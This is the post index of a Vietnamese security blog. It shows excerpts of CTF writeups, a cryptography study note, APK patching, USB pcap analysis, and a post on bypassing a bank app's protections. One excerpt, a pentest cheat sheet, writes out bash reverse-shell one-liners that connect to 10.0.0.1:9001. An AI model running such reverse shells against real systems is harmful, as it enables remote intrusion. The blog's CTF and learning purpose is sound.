Home
WhiteBearVN
Cancel

[Writeup] TetCTF 2023

Trong bài này anh Tsu cho chúng ta một file code: Phân tích source code ta thấy bot sẽ querry theo các thông tin có sẵn trong các array và in ra theo điều kiện đầu vào. Để có được flag, ta cần phả...

My note for quick to use

My note for quick to use in HackTheBox, TryHackme, VulnBox,… Reverse shell Bash $ bash -i >& /dev/tcp/10.0.0.1/9001 0>&1 $ 0<&196;exec 196<>/dev/tcp/10.0.0.1/9001; sh ...

[Writeup] FwordCTF 2021 - Forensics

listening? Chúng ta có đề bài là một file pcap. Sau khi nhìn tổng quan thì tất cả các package đều chỉ chung về việc truy cập OAUTH2 của google kèm theo đó là các biến client_secret; refresh_token;...

[Writeup] corCTF 2021

fibinary Bài này chúng ta có source code encrypt: fib = [1, 1] for i in range(2, 11): fib.append(fib[i - 1] + fib[i - 2]) def c2f(c): n = ord(c) b = '' for i in range(10, -1, -1): if n >...

[Writeup] BSides Noida CTF 2021 - Deathnote

Bài này cho chúng ta 1 vuln box trên tryhackme và nhiệm vụ là phải cat được flag trong root folder. Đầu tiên, mình dùng nmap để xem các port đang mở trên box này. $ nmap -vv -sV -sT -sC 10.10.164....

[Research] Học cryptography (P.1)

Dịch giặc hoành hành, nên mình có thời gian thêm ở nhà làm việc và research một vài thứ mới, hay ho và để bổ sung kiến thức. Mã hóa là một phần của CTF và ATTT; nên mình quyết định học crypto làm c...

[Lỗi vu vơ] Thay đổi số tiền chuyển khoản SMS gửi về của ngân hàng MQĐ

Vài hôm trước mình có được một người anh nhờ reverse và bypass các tính năng bảo mật cho ứng dụng của ngân hàng MQĐ trên Android; cũng lâu rồi chưa làm gì đụng lại đến Android nên mình thấy đây là ...

Decompile và Recompile ứng dụng APK

Cách mình patch code và nghịch ngợm 1 file APK. 0x01: Các công cụ cần thiết: Các bạn tải những công cụ: apktool_Công cụ giúp chúng ta decompile từ 1 file APK sang mã nguồn smali và Recompile t...

USB PCAP - Phần 1 Bàn phím

Một bài chia sẻ, tổng hợp kiến thức cá nhân giúp mình hoàn thành các thử thách truyền thông tin sử dụng giao thức USB sang PC/Laptop được capture thông qua Wireshark hoặc T-shark và lưu dưới tệp ti...

[Writeup] Diễn tập ATTT Ngân hàng Nhà Nước 31/03/2021

0x01: Ứng cứu sự cố, điều tra số 1. Time2Attack Trong bài này, ban tổ chức (BTC) cung cấp 1 file pcap. Sau khi mở bằng wireshark ta có 1 file zip với tên time.zip. Nhận thấy đây là 1 file zip yêu...